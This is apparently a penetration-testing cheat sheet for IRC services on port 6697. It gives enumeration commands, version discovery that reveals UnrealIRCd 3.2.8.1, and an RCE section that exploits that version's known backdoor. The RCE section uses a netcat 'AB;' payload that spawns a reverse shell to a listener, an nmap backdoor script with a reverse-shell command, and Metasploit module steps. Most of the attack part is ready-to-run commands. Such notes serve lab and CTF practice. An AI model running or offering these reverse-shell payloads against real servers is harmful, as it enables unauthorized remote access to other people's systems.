Information

Default Port: 6697

PORT     STATE SERVICE
6697/tcp open  ircs-u                                                        

Enumeration

nc -vn 192.168.1.2 6697
timeout 0.1 bash -c "nc -nv 192.168.1.2 6697"

nmap -p6697 -sS 192.168.1.2
nmap -p6697 -sVC 192.168.1.2
nmap -p6697 --script=irc-unrealircd-backdoor.nse 192.168.1.2

Version

irssi -c 192.168.1.2 --port 6697
irssi -c 192.168.1.2 --port 6667
irssi -c 192.168.1.2 --port 8067
 Irssi v1.4.5 - https://irssi.org                                                                                                                                                        
13:35 -!- Irssi: Looking up 192.168.1.89
13:35 -!- Irssi: The following settings were initialized
13:35                        real_name root
13:35                        user_name root
13:35                             nick root
13:35 -!- Irssi: Connecting to 192.168.1.89 [192.168.1.89] port 6697
13:35 Waiting for CAP LS response...
13:35 -!- Irssi: Connection to 192.168.1.89 established
13:35 !irc.foonet.com *** Looking up your hostname...
13:35 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead
13:35 -!- Welcome to the ROXnet IRC Network root_!root@192.168.1.5
13:35 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1
13:35 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
13:35 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj

RCE

Netcat

nc -lvnp 443
echo "AB;nc -e /bin/sh 192.168.1.2 443" |nc 192.168.1.3 6697

Nmap

nc -lvnp 443
nmap -p6697 --script="irc-unrealircd-backdoor" --script-args=irc-unrealircd-backdoor.command="nc 192.168.1.2 443 -e /bin/sh" 192.168.1.3

Metasploit

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf > show options
msf > set RHOST 192.168.1.2
msf > exploit